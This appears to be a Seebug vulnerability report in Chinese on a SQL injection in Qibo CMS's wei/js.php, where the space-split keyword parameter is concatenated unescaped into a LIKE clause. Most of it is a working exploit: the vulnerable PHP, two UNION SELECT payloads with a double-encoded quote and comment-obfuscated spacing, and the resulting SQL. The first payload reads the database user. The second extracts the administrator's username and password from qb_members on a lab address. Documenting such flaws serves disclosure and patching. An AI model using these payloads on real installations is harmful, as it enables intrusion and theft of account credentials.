<ul><li>/wei/js.php</li></ul><pre class=""> elseif($type=='like')
{
$SQL.=" AND id!='$id' ";
if(!$keyword)
{
extract($db->get_one("SELECT keywords AS keyword FROM {$_pre}content WHERE id='$id'"));
}
if($keyword){
$SQL.=" AND ( ";
$keyword=urldecode($keyword);
$detail=explode(" ",$keyword);
unset($detail2);
foreach( $detail AS $key=>$value){
$detail2[]=" BINARY title LIKE '%$value%' ";
}
$str=implode(" OR ",$detail2);
$SQL.=" $str ) ";
}else{
$SQL.=" AND 0 ";
}
$_INDEX=" USE INDEX ( list ) ";
$ORDER=' list ';
}
</pre><p>Keyword由空格分割后再implode带入SQL语句,造成SQL注入。</p><p>当发送payload:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM qb_wei_content USE INDEX ( list ) WHERE fid IN ( 4,5,6 ) AND id!='0' AND ( BINARY title LIKE '%n%')UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#%' ) AND yz=1 ORDER BY list DESC LIMIT 7</pre><p>页面返回结果: </p><p><img alt="DFB28012-E968-45E0-B042-C9BEB3D84197.png" src="https://images.seebug.org/@/uploads/1434682839970-DFB28012-E968-45E0-B042-C9BEB3D84197.png" data-image-size="680,204" width="680" height="204"><br></p><p>证明漏洞存在。</p><p>发送payload:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,(select/**/concat(username,0x3a,password)from/**/qb_members/**/limit/**/1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>到:</p><pre class="">http://10.211.55.3/qibo5/wei/js.php?type=like</pre><p>得到管理员的帐号密码: </p><p><img alt="FE33D81D-4889-4517-BC40-2E219CE2E4F9.png" src="https://images.seebug.org/@/uploads/1434682879217-FE33D81D-4889-4517-BC40-2E219CE2E4F9.png" data-image-size="1584,402"><br></p>
共 5 兑换了
京公网安备 11010502034610号
暂无评论